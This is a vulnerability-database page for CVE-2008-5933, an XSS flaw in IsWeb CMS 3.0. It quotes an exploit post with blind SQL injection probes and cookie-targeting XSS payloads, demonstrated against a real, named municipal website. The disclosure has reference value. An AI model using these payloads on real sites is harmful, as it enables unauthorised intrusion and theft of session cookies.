CMS ISWEB 'index.php'多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117026 漏洞类型 跨站脚本
发布时间 2008-12-14 更新时间 2009-01-29
CVE编号 CVE-2008-5933 CNNVD-ID CNNVD-200901-255
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7465
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-255
|漏洞详情
CMSISWEB3.0版本中的index.php存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)strcerca参数(又称cerca操作的输入字段)(2)id_oggetto参数注入任意的web脚本或HTML。
|漏洞EXP
[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.cmsisweb.it

>---------------------------------------<
 
 
[â– ] BlinD $qL:
 
|: http://www.example.com/index.php?id_sezione=[$qL] 

> DeM0:
 
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
 
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
 
 
[â– ] XSS: 
 
|: http://www.comune.avezzano.aq.it/index.php?azione=cerca  
  In this modul (search) write:
 
  "><script>alert(document.cookie)</script> 
 
or another vuln Page:
 
|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
 
[â– ] Th4nKs::
 
\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</

# milw0rm.com [2008-12-14]
|参考资料

来源:BID
名称:32823
链接:http://www.securityfocus.com/bid/32823
来源:MILW0RM
名称:7465
链接:http://www.milw0rm.com/exploits/7465
来源:SREASON
名称:4933
链接:http://securityreason.com/securityalert/4933
来源:SECUNIA
名称:33090
链接:http://secunia.com/advisories/33090